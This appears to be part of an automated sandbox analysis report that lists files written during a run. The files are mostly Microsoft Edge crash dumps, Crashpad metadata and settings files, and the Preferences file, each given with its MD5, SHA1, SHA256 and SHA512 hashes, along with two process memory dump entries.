MD5 1222db2c0afe79e11389b8d49ff416fa
SHA1 64ff46e19b6205981a6489f3a9b1d445ecd07711
SHA256 7fadcc2b797511bc24a4be721e4ade5d36643483bffa77be2f35d7b86f3ff91c
SHA512 f762a7bd6da71ba3d4f07d721f93c9882e3d83089590b201c1e9678b0e91f0a40e864ea802a8aaa022dc8e815fd813f23ceff9a1414f12e226025b92c96a4b18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c4d2c004-f463-4ea0-bcd8-4cfd3dc20522.dmp

MD5 925ed65271c895b2b44bd92b810edce0
SHA1 3d98262096e70562d21b1301f7743d893613156d
SHA256 c267eedca2a137904ef2f0911fb36b9bf340f8e1ba45b94219ddcb6a86a4df9c
SHA512 d085936a42e334029524ce9db7f019fb813634d39965e5f525ef3c6cb2e32d318bea5e8a0715eb570c02c2609b5cf0d017fa18932b01440687fa915f808ac92f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 fe675660c9f79754482dc11ef1f3aac6
SHA1 be137787d26e7ea43ecfd2a4f036b3ac0e0fbd8b
SHA256 64557977db988b42906361dd3f484124ed1b9bb458d454e2971ffc1fc3a767ac
SHA512 0b07e8bb227b551aca29b78fba21c9906b0b3d5bd1f52cd0a825c8d50e7aa12afaa3a111f642223f4c78ce73dd57c31fff4ab88f51052e256b5e94ef1633eb95

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2b08fdd6-cc78-4223-ac01-757221ff5d1b.dmp

MD5 3613e381b60e8477348f46e4627ee11d
SHA1 0ae896ff91c2770e3dec92e0d4658517f076073f
SHA256 6c42fd4db6ff22734ef856780eb6f0b185719ba99073de50f388dc17b0d07e1f
SHA512 bd92f66652933355ea5e7857d757a46f512468b02a3819b6e8291808afc25ebffb76a9cb3fc320defae57d35d6df95427658c770819b3d339080d1c9281412a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5fbbcf5e98501ad643a916b251fccec9
SHA1 c66bc75e8bfaf678031c732b8f72d1c76d63212d
SHA256 3cbb00709b5fbbc40ab639da142a96435ec0c1d511bec16d3d05db3661fe3c22
SHA512 356cff1a875a4aa789dd4c4f36112f1265febf636bfdc3c25801555eac81a11c56662fac78f190268602bac5f5be18e3217f128bf6fb6d2cce2d13e13e5e574a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 88d3670aedd9c4f2d5b5644d34bdbc03
SHA1 19b1b93f3cccc68acf47ce50469e4a3aaa8d6669
SHA256 d7188a8bffc744af0e84f9e2e75caa9d037ab25520f05aef2a063bd2c67b8c4f
SHA512 d805450c13de2cd8c1703ab8e139193d53a357691072cd5d0b5cfa1c882f10b2c6c11cc49f2f38836c24c294524542b6a13aa7b9c4f1b156d631b2c4cf9f769e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b9c1177a-17b9-4ce1-9ad3-bd45e86dba09.dmp

MD5 0e6995f4af6c8417268a3b6f12e6399f
SHA1 38b5dd97e70d2340c4dbaa2dd9f42eef8f7e2c43
SHA256 0dc4279ff7b174331e349e7a3fe60ff9d2cdb735db903c01e44f2b7845a9ca58
SHA512 848aafec47e6d5b6a0df4a24bc3c436047936f6e79c0f25a7010d2280bb4e09d6bef469b8476f0ce7ba21f6158638e3314859ef701fe8030d188c431392a46b8

memory/5436-1698-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/5436-1701-0x0000000000E90000-0x000000000134F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d20a0ff6fb738451151f0192df996bca
SHA1 6928c8adac56a75c28d369ce0647bf99954652d3
SHA256 029476e4619860fa0238a31cbd06d591a57c28824f7041f57e6a3263a2dfbaa9
SHA512 75454753274c11b5d1242a886a5222f220189609bcaba05a8042b57e3223a3a80b812f7e9bcb0ea18e7bbaad4a5cc00f539f8bd05842a7a44ef034546e0102c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 514c89e4bb6e6e0b609ad9b19fc13d64
SHA1 157cccad482d3d2e6e57008c2612e71388d7d8a2
SHA256 d1796a948b3fc46d60d15b6e3efa88e25e002ca509ac1bb007739cd18a0ced61
SHA512 138cfcf3195fac4f9422bd4b545cb40694e1677185c2f0f934163b454d68d3195a5b090c867c15cb49cc1b02831863ac09e1f53843b9f403a709bb767cc0e443

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 61f96367ad64c5482240b2d6a63ca5e7
SHA1 24ba0f2ac372fef03d079f354b9a3c5ff08cb4d6
SHA256 e2b0a6555803ee15267484c8065f4d2ba6155ecfe18e9fc8a807533b05b8bbb3
SHA512 e6d336f96fcc3ac3b6d9b7e89205f99de0a3baec63fec63ea668213b6d494d4dbe110aa2a7f424edf5a71b4928f1792e2e1b79f5f8ee2d9c9ec8c3420e1741b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\af1d4bba-8dee-4f41-a7e6-8c227364f1f0.dmp

MD5 6cf6119af132603f0912f92cc882c7c4
SHA1 8bfbefb8902d10932d3c9d50ed217ee9ac47b384
SHA256 b578a8b8ff1f909bdba66674e93dfd57b9c39c6c00244da9b25abbadeaaa44ca
SHA512 b4bd9ca04d7756623d23775b324e364991fbaeb52c7f4b9ad81e7bb44e832c1a0c8731efc19d95758131b420d1d81a73d39a819ea4b819e1b0c77bde147d34b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 646a45bb676278e3aeae9548b61b3428
SHA1 ba5cf8e031611d2200f8422554519bf636bee191
SHA256 dc97b68364174b1da16defb3229ef02752c0e10e3ac1cf81cc85df91ef27be3f
SHA512 2acf852ff3b6e636fadc9cf27c1b4f39484a0b903fab82af1de2d59c76e4fcc1f94e1d45c890bba38bca78b65234e8328ad7e06e0b52da3a54228fde7f012019